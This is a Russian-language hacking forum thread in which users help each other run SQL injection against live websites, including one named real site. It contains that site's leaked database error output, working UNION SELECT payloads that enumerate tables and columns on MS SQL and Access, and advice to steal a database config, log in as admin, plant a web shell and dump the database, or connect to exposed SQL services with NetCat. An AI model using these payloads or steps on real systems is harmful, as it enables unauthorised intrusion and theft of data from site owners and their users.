да нет я просто спросил возможно ли другие варианты обхода без знания таблиц, а то за..лся с этим скулем
если нету доступа к msysobjects,а так обычно и бывает,то только подбирать наугад таблицы.Можно ещё попробывать как здесь http://forum.antichat.ru/showpost.php?p=523825&postcount=36
что значит налету? если огнелисом пользуешься то есть соответсвующий плугин. (модификация http заголовков)
на ачате есть куча статей по LFI/RFI-уязвимостям ты сначала с одним расберись (sql-ing), потом уже изучай что-то другое
т.е. например есть флешка она отсылает гет запрос примерно такого вида http://localhost/gate.php?test=asdfg так вот в тот момент как она его отсылает мне надо поправить значение test. Пробывал тампер дату но как оказалось она такое неумеет, а ты про какой плагин говорил?
не могу раскрутит дальше Code: http://wallstreetcorner.com:80/ss2.html?Symbol=' можеть кто поможеть? выдает: Code: [B]An error occurred processing your request [/B] Merging data into macro form: e:\cyberspace\wallstreetcorner\ss2.html WebBase ODBC error in: {sql to Special source 'clients' user 'admin'} [B]**ODBC/driver/database error in sql statement: {sql to Special source 'clients' user 'admin'} SELECT * FROM Situations WHERE Symbol = ''' ORDER BY ID[/B] {/sql} Using cached connection:: 'clients'/'admin'/' ' ('Microsoft Access Driver (*.mdb)' SYN 3804 11/09/09 21:16:35 EST 11/09/09 22:49:17 EST +1:32:42 0) ODBC API call: 'statement executeDirect:' returned the following error message: ' [B]{execDirect}[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'Symbol = ''' ORDER BY ID'. (sqlState: 37000) SELECT * FROM Situations WHERE Symbol = ''' ORDER BY ID[/B] WebBase ODBC (EwXx08.120@Windows 2000 5.0) ** In file: [B]e:\cyberspace\wallstreetcorner\ss2.html[/B] inserted by: [B]e:\cyberspace\wallstreetcorner\disclaimer.html[/B] ;; near line number 6 ;; following starts near line number 7 in your source form... ... {set Iaccept 'YES'} {setUser userIaccept Iaccept} {sql to Special source 'clients' user 'admin'} SELECT * FROM Situations WHERE Symbol = '{Symbol}' ORDER BY ID {/sql} {forRow aRow on Special max 1} ... **
MSSQL вроде, но что за дурацкая реакция на ошибку??? Кто знает? не всегда же так.обчно просто строчка...ошибка там та и все. Что имеем? Тип БД - MSSQL Раскрытие путей - e:\cyberspace\wallstreetcorner\disclaimer.html запрос к бд - SELECT * FROM Situations WHERE Symbol = '11111111111'' ORDER BY ID при Symbol=11111111111' + EwXx08.120@Windows 2000 5.0) смотри как инекции проводить в mssql гыгы сайт то не пашет http://wallstreetcorner.com/ss2.htm и даже при http://wallstreetcorner.com/ss2.html?Symbol=1 ошибка)
Зайди в тему "Энциклопедия уязвимых скриптов" да и посмотри (имхо sql-inj чаще встречается) Почему это? 1. Сливаешь конфиг файл для подкл. к БД, смотришь пароль, пробуешь зайти под админом и под паролем который был в конфиге к примеру на форум, если захошел то заливаешь шелл и потом сливаешь БД через шелл 2. Если сервис sql доступен из интернета то просто подкл. к нему с помощью какой либо утилиты (я для этого юзаю NetCat) Ну ты думаешь своей головою? Тебе надо искать мануалы по lfi/rfi а не уязвимости в движках (я понимаю что хочется понять вот так сразу но надо с мануалов начинать)
я уже пробовал стандартные методы инъекций Code: http://wallstreetcorner.com/disclaimer.html?Symbol=' пашет
http://www.site.com/ShopList.asp?Cat=-34+union+select+1,2,3,4,5,6,table_name,8+from+information_schema.tables-- Получил таблицу MyAccessLog БД MS SQL,в мускуле используется лимит,а сдесь как сделать чтобы получить имена остальных таблиц?Пробовал как в статьях 1 or 1=@@version-- и тд,запросы такие неработают.
2Fed123, cat=-1+union+select+top+1+1,2,3,4,5,6,table_name,8+from+information_schema.tables+where+table_name+not+in+(select+top+1+table_name+from+information_schema.tables)-- Хм ну как-то так вроде, поэкспериментируй
спс |1ght я уже много раз прочитал ту статью. Твой линк помоему ничего не изменил вроде. Неужели от явного скуля нельзя что то делать?
Code: http://wallstreetcorner.com/disclaimer.html?Symbol=TCRV%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+Situations%00
Спасибо,все получилось.Теперь пролема с колонками При запросе Code: -34+union+select+top+1+1,2,3,4,5,6,column_name,8+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=MyUsers+AND+COLUMN_NAME+NOT+IN+(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME=MyUsers) страница нормально отображается,но ничего невыводит.И если несложно объясни как и зачем все пишется
